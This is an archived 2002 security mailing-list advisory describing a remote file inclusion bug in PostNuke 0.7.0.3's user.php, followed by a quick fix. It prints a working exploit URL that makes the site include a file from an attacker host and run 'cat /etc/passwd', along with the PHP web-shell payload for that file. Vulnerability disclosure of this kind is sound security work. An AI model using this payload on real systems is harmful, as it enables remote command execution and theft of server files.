postnuke v 0.7.0.3 remote command execution

From: pokleyzz sakamaniaka (pokleyzzat_private)
Date: Wed Mar 27 2002 - 17:03:21 PST

Next message: Florian Weimer: "Re: 1024-bit RSA keys in danger of compromise"

Previous message: Eric Budke: "Citrix Nfuse directory traversal with boilerplate.asp"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) post nuke is one of popular content management system written in php . there are bug in file user.php line 107 which user can append $caselist array with their own value. foreach ($caselist as $k=>$v) { $ModName = $v['module']; include "$v[path]/$k"; } $caselist = array(); http://lame_host/user.php?caselist[bad_file.txt][path] =http://bad_host&command=cat%20/etc/passwd bad_file.txt (put in bad_host document root): -- start bad_file.txt ----- <pre> <?php system($command); ?> -- end bad_file.txt ----- quick fix: put on line 28 : $caselist = array(); http://inetd-secure.net/ http://www.mybsd.org.my/pokleyzz/

Next message: Florian Weimer: "Re: 1024-bit RSA keys in danger of compromise"
Previous message: Eric Budke: "Citrix Nfuse directory traversal with boilerplate.asp"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Mar 28 2002 - 10:37:33 PST